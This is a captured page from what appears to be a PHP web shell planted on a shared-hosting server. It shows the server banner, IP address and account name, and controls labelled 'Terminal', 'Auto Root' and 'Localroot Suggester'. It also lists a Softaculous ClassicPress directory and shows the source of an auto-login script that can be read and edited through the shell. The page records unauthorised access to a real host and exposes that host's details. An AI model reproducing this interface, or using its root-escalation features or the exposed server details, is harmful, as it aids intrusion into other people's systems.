Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.118.27.44
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
classicpress /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
php53
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
php56
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
php71
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
php81
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
php82
[ DIR ]
drwxr-xr-x
2025-03-17 14:17
.htaccess
482
B
-rw-r--r--
2024-02-23 09:14
_htaccess
333
B
-rw-r--r--
2024-02-23 09:14
_index.php
59
B
-rw-r--r--
2021-12-23 11:54
_wp-config.php
3.44
KB
-rw-r--r--
2024-02-23 09:14
check_charset.php
1.82
KB
-rw-r--r--
2021-12-23 11:54
classicpress.sql
29.67
KB
-rw-r--r--
2025-03-17 10:46
classicpress.zip
10.32
MB
-rw-r--r--
2025-03-17 10:46
clone.php
15.63
KB
-rw-r--r--
2025-03-17 12:31
edit.php
5.12
KB
-rw-r--r--
2025-03-17 12:31
edit.xml
628
B
-rw-r--r--
2021-12-23 11:54
extend.php
3.94
KB
-rw-r--r--
2025-03-17 12:31
fileindex.php
305
B
-rw-r--r--
2021-12-23 11:54
import.php
5.71
KB
-rw-r--r--
2025-03-17 12:31
info.xml
2.89
KB
-rw-r--r--
2025-03-17 10:46
install.js
924
B
-rw-r--r--
2021-12-23 11:54
install.php
19.73
KB
-rw-r--r--
2025-03-17 12:31
install.xml
1.23
KB
-rw-r--r--
2021-12-23 11:54
md5
3.2
KB
-rw-r--r--
2025-03-17 12:31
multisite.sql
37.08
KB
-rw-r--r--
2025-03-17 10:46
notes.txt
1.76
KB
-rw-r--r--
2024-12-09 05:21
sign_on.php
1010
B
-rw-r--r--
2021-12-23 11:54
soft.htaccess
127
B
-rw-r--r--
2021-12-23 11:54
wp-config.php
3.15
KB
-rw-r--r--
2024-02-23 09:14
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } // Dummy plugin dir so that no plugins are loaded as they conflict with our login process define('WP_PLUGIN_DIR', '[[softpath]]/[[autopass]]'); require('wp-blog-header.php'); require('wp-includes/pluggable.php'); $signon_user = '[[signon_username]]'; //Backword compatibility ($__setting['signon_username'] won't be there in previous versions <= 5.2.3) if(!empty($signon_user) && !preg_match('/^\[\[(.*?)\]\]$/is', $signon_user)){ $user = get_user_by('login', $signon_user); }else{ $user_info = get_userdata(1); // Automatic login // $username = $user_info->user_login; $user = get_user_by('login', $username); } // Redirect URL // if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = admin_url(); wp_safe_redirect( $redirect_to ); exit(); }